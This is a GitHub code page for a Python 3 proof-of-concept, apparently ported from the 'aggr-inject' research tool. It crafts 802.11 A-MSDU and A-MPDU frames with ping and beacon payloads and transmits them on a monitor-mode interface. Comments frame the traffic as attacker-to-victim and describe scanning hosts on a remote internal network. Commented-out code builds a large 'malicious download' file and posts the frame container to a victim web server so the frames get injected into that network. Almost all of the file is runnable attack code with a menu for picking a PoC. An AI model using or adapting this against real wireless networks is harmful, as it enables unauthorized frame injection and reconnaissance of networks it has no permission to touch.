forked from rpp0/aggr-inject
-
Notifications
You must be signed in to change notification settings - Fork 0
/
aggr-inject_python3.py
270 lines (224 loc) · 9.9 KB
/
aggr-inject_python3.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
#!/usr/bin/env python3
from rpyutils_python3 import printd, Color, Level, clr, VERBOSITY
from packets_python3 import Dot11Packet, AMPDUPacket, AMSDUPacket, ping_packet, arp_packet, tcp_syn, ssid_packet, probe_response
import requests
import random
import sys
#this is useful to dump packets in hex mode
import hexdump
import time
class MaliciousDownload():
def __init__(self, package):
self.data = str(package)
def write(self):
with open('download.jpg', 'w') as f:
for i in range(0, 10000):
f.write(("\x00" * random.randint(0, 3)) + str(self.data))
def fuzztf(option1, option2):
test = random.randint(0, 1)
if test:
return option1
else:
return option2
"""
def main_download():
# Malicious download
raw_input("This will create a 300 MB file download.jpg in the working directory. Press any key to continue or CTRL+C to exit.")
printd(clr(Color.YELLOW, "Creating malicious download..."), Level.INFO)
container = ""
for i in range(0, 256):
# Containers are (series of) frames to inject into the remote network
# Container for scanning hosts on internal network
#md_pkt = AMPDUPacket('ff:ff:ff:ff:ff:ff', '4C:5E:0C:9E:82:19', '4C:5E:0C:9E:82:19', 0x02)
#md_pkt.add_msdu(ping_packet(i, "10.0.0.1", "192.168.88.249"))
#md_pkt.add_padding(8)
# Container for a Beacon frame
md_pkt = ssid_packet()
container += str(md_pkt)
md = MaliciousDownload(container)
md.write()
"""
def main():
count = 1
ip_count = 1
# send the packet a number of times
for i in range(0, 10):
count = (count + 1) % 1024
ip_count = (ip_count % 255) + 1
# Create an empty packet (Radiotap + dot11 header)
pkt = Dot11Packet('ff:ff:ff:ff:ff:ff', '64:D1:A3:3D:26:5B', '64:D1:A3:3D:26:5B')
# dump the radiotap header
printd(clr(Color.YELLOW, "Radiotap:"), Level.INFO)
hexdump.hexdump(bytes(pkt.rt), result='print')
printd("", Level.INFO) #print a linefeed
# print the radiotap headerin this format:
# "\x00\x00\x12\x00\x2e\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6c\x62\x27\x6c\x5c\x74\x27\xc0\x00\xc0\x01\x00\x00"
for my_bytes in bytes(pkt.rt):
print(''.join('\\x{:02x}'.format(my_bytes)), end='', flush=True)
printd("", Level.INFO) #print a linefeed
printd("", Level.INFO) #print a linefeed
# print the 802.11 header
printd(clr(Color.YELLOW, "802.11 hdr:"), Level.INFO)
hexdump.hexdump(bytes(pkt.dot11hdr), result='print')
sys.stdout.flush()
# add an MSDU to the packet
pkt.add_msdu(ping_packet(count, "10.0.0.1", "192.168.0." + str(ip_count)))
printd(clr(Color.YELLOW, "MSDU added:"), Level.INFO)
#sys.stdout.flush()
#hexdump.hexdump(str(ping_packet(count, "10.0.0.1", "192.168.0." + str(ip_count))))
sys.stdout.flush()
printd(clr(Color.YELLOW, "Radiotap + 802.11 hdr + MSDU + CRC:"), Level.INFO)
#sys.stdout.flush()
#hexdump.hexdump(str(pkt.data))
sys.stdout.flush()
#for character in str(pkt.data):
# this prints "\x 80 \x 04 \x bb \x 4e \x 88 \x 02 \x 00 \x 00 \x ff \x ff \x ff \x ff \x ff \x ff \x 64 "
#print "\\x",character.encode('hex'), #does not work in python3
#print character, character.encode('hex'),
#print("", Level.INFO) #print a linefeed
# send the packet
pkt.send() #the interface has to be in monitor mode
printd("packet sent", Level.INFO)
time.sleep(0.1)
# send packets with a number of MSDU (A-MSDU)
def main_amsdu():
count = 1
ip_count = 0
count = (count + 1) % 1024
ip_count = (ip_count % 255) + 1
# Ping from attacker --> victim
# You need to change the MAC addresses and IPs to match the remote AP
amsdu_pkt = AMSDUPacket('ff:ff:ff:ff:ff:ff', '64:D1:A3:3D:26:5B', '64:D1:A3:3D:26:5B', 0x02)
printd(clr(Color.YELLOW, "AMSDU Radiotap (rt):"), Level.INFO)
#sys.stdout.flush()
#hexdump.hexdump(str(amsdu_pkt.rt))
#for character in str(amsdu_pkt.rt):
# this prints "\x 00 \x 00 \x 12 \x 00 \x 2e \x 08 \x 00 \x 00 \x 00 \x 6c \x 6c \x 09 \x c0 \x 00 \x c0 \x 01 \x 00 \x 00 "
#print "\\x",character.encode('hex'), #does not work in python3
#sys.stdout.flush()
print("", Level.INFO) #print a linefeed
printd(clr(Color.YELLOW, "AMSDU dot11hdr:"), Level.INFO)
#sys.stdout.flush()
#hexdump.hexdump(str(amsdu_pkt.dot11hdr))
sys.stdout.flush()
# add an MSDU
amsdu_pkt.add_msdu(ping_packet(count, "10.0.0.1", "192.168.0." + str(ip_count)))
printd(clr(Color.YELLOW, "AMPDU with the MSDU added:"), Level.INFO)
#sys.stdout.flush()
#hexdump.hexdump(str(amsdu_pkt))
sys.stdout.flush()
printd(clr(Color.YELLOW, "AMSDU data:"), Level.INFO)
#sys.stdout.flush()
#hexdump.hexdump(str(amsdu_pkt.data))
sys.stdout.flush()
#for character in str(amsdu_pkt.data):
# this prints "\x 80 \x 04 \x bb \x 4e \x 88 \x 02 \x 00 \x 00 \x ff \x ff \x ff \x ff \x ff \x ff \x 64 "
#print "\\x",character.encode('hex'), #does not work in python3
#print character, character.encode('hex'),
print("", Level.INFO) #print a linefeed
# send the packet a number of times
for i in range(0, 10):
# send the packet
amsdu_pkt.send() #the interface has to be in monitor mode
printd("AMSDU packet sent", Level.INFO)
time.sleep(0.1)
# Connect to victim web server and POST malicious host scanning ICMP frames (push to victim)
def main_ampdu():
# "Requests" Python library: http://docs.python-requests.org/en/master/user/advanced/
#session = requests.Session()
count = 1
ip_count = 0
printd(clr(Color.BLUE, "Building container..."), Level.INFO)
""" Build container """
container = ''
for i in range(0, 2):
count = (count + 1) % 1024
ip_count = (ip_count % 255) + 1
# Ping from attacker --> victim
# You need to change the MAC addresses and IPs to match the remote AP
ampdu_pkt = AMPDUPacket('ff:ff:ff:ff:ff:ff', '64:D1:A3:3D:26:5B', '64:D1:A3:3D:26:5B', 0x02)
printd(clr(Color.YELLOW, "Radiotap (rt):"), Level.INFO)
#sys.stdout.flush()
#hexdump.hexdump(str(ampdu_pkt.rt)) #this was valid for python2
#hexdump.hexdump(bytes(ampdu_pkt.rt))
#for character in str(ampdu_pkt.rt):
# this prints "\x 00 \x 00 \x 12 \x 00 \x 2e \x 08 \x 00 \x 00 \x 00 \x 6c \x 6c \x 09 \x c0 \x 00 \x c0 \x 01 \x 00 \x 00 "
#print "\\x",character.encode('hex'), #does not work in python3
#sys.stdout.flush()
print("", Level.INFO) #print a linefeed
printd(clr(Color.YELLOW, "dot11hdr:"), Level.INFO)
#sys.stdout.flush()
#hexdump.hexdump(str(ampdu_pkt.dot11hdr))
sys.stdout.flush()
# add an MSDU to the AMPDU
ampdu_pkt.add_msdu(ping_packet(count, "10.0.0.1", "192.168.0." + str(ip_count)))
printd(clr(Color.YELLOW, "AMPDU with the MSDU added:"), Level.INFO)
#sys.stdout.flush()
#hexdump.hexdump(str(ampdu_pkt))
sys.stdout.flush()
ampdu_pkt.add_padding(8)
printd(clr(Color.YELLOW, "AMPDU with MSDU and 8 padding delimiters added:"), Level.INFO)
#sys.stdout.flush()
#hexdump.hexdump(str(ampdu_pkt))
sys.stdout.flush()
container += str(ampdu_pkt)
# Beacon from attacker --> victim
#ampdu_pkt = ssid_packet()
#container += str(ampdu_pkt)
# Ping from victim --> access point
#ampdu_pkt = AMPDUPacket('4C:5E:0C:9E:82:19', 'f8:1a:67:1b:14:00', '4C:5E:0C:9E:82:19')
#ampdu_pkt.add_msdu(ping_packet(count, "192.168.88.254", "10.0.0." + str(ip_count)))
#ampdu_pkt.add_padding(8)
#container += str(ampdu_pkt)
""" end package """
printd(clr(Color.BLUE, "Final A-MPDU built:"), Level.INFO)
sys.stdout.flush()
#hexdump.hexdump('\x00'*16)
#hexdump.hexdump("Hello world")
hexdump.hexdump(container)
sys.stdout.flush()
#for character in container:
# this prints "\x 80 \x 04 \x bb \x 4e \x 88 \x 02 \x 00 \x 00 \x ff \x ff \x ff \x ff \x ff \x ff \x 64 "
#print "\\x",character.encode('hex'), #does not work in python3
#print character, character.encode('hex'),
print("", Level.INFO) #print a linefeed
# send the packet a number of times
for i in range(0, 10):
# send the packet
ampdu_pkt.send() #the interface has to be in monitor mode
printd("packet sent", Level.INFO)
time.sleep(0.1)
"""
while 1:
print("."),
sys.stdout.flush()
request_params = {'postpayload': ("\x00" * random.randint(0, 3)) + str(container)}
try:
session.post("http://" + "10.0.0.6:80" + "/index.html", files=request_params, timeout=5)
except requests.exceptions.ConnectionError:
printd(clr(Color.RED, "Could not connect to host"), Level.CRITICAL)
pass
except Exception:
printd(clr(Color.RED, "Another exception"), Level.CRITICAL)
pass
"""
if __name__ == "__main__":
try:
#pocnum = raw_input("option 1: send normal packets. " # this was valid in Python2
# "option 2: send AMSDUs. "
# "option 3: send AMPDUs. "
# "Choice: ")
pocnum = input("option 1: send normal packets. " # this is valid in Python3
"option 2: send AMSDUs. "
"option 3: send AMPDUs. "
"Choice: ")
if pocnum == "1":
main()
elif pocnum == "2":
main_amsdu()
elif pocnum == "3":
main_ampdu()
else:
printd("Invalid PoC number.", Level.CRITICAL)
except KeyboardInterrupt:
printd("\nExiting...", Level.INFO)